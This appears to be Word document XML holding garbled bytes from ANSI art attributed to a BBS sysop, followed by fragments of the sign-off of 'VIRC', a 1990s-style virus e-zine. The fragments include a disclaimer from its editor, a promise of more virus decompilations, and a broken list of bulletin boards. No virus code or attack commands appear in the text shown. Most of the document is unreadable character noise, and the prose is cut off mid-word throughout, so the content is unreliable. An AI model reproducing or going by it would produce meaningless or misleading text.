        <w:t>ޱ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���� ��۲����������� ��۲���������������������� � � ��� ��� ���۰� </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ޱ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 ��۲��������۲� �۲�������������������������  �� �� ް� ���۰��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۲��� ����������۲���۲�������������������������� �� ��� �� ���۰��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۲������۲�������������������������� �� �� � �� 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۲�������������������������� �� � ް��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޲�������������� ������������������������������� �� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w: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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>޲��������������������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>��������� ް�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w: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۲��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ޱ������������������������������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>��� ����� ܰ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>����� 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 �۲�� ��������������� </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ޱ��������������������������� ܰ��������� ����� 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۲�� ߱������������� ߱���������������������� �ܰ��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 ���۲�� �߰�����������߱���������������� �ܰ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  �����۲�� �߰������  �   �߱���������� ܰ�������� ܰ���������������  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����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ܲ�����   ������ � ް ���� ܰ����� � ����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ܱ����ܱ��۲���۱���������� ܰ���� � ް��� �ܱ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ܱ����۲����۲�������۲���۲���� �� ������� ߰�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>޲�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۲</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>� �� ����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۲����������۲��۲��������۲����� ��ܱ�������� �� ۲�۲����ܲ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۲�������������������۲�������������۲�����۲��� ����������۲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������   �������   �����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� ������ �� ����� �� ������ �� ���� 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߲��۲��۲���������� </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>޲� ���� ޲� ����� ޲� ��� ޲� ��������������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This ANSI was made by the SysOp of Red Sky BBS////  Thnx a lo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Conclu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at wraps it up for the first issue of VIRC. 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archy stuff in it this time, but there was a ton of Virii stu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really into the virii stuff, then go phuck your self..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for more.  In the next issue, tuned to come out in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I think, there will be many more decompilations, etc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ere to reach me, then just call any good board, and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ll - and just mention VIRII215.DOC.  If you know who I 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one or might know me... well... then I guess your in luck.  Any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n.... have phun phuck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Gatekeeper of VIR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Inform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lectronic Magazine is published as-is.  The autho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Gatekeeper of VIRC, is not responsible for any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activities as a result of this E-M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this Magazine because I thought it was kind of ke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agazine.  I wanted to do something that a lot of people w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into account when they are writing virii.  I kind of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40HEX Virii text stories, and am ever so grateful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 off on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places you can get in touch with m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make it easier for you by giving my handle out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an happen to me as a result of publishing this magazine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ruth, I am afraid of the government, and the ever increasing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aking which is limiting the freedom of speech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However, I will give you a list of location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 following address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E-Mail to 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           :  VIRII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n the first conference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ble to receive this E-Mail at any one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Revival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Power   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 Era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       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Zone                                 (E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rium    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terprise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ian                                (Geo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ble's Byte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Alliance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ky     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W        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s                    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